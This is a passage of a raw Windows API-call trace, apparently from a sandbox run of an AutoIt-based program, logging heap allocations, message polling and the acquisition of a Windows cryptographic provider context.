RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0210.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.059] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.059] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.060] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0210.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0210.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0210.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0210.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0210.060] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0210.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0210.061] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0210.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.064] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0210.065] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0210.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0210.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.066] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0210.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0210.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, 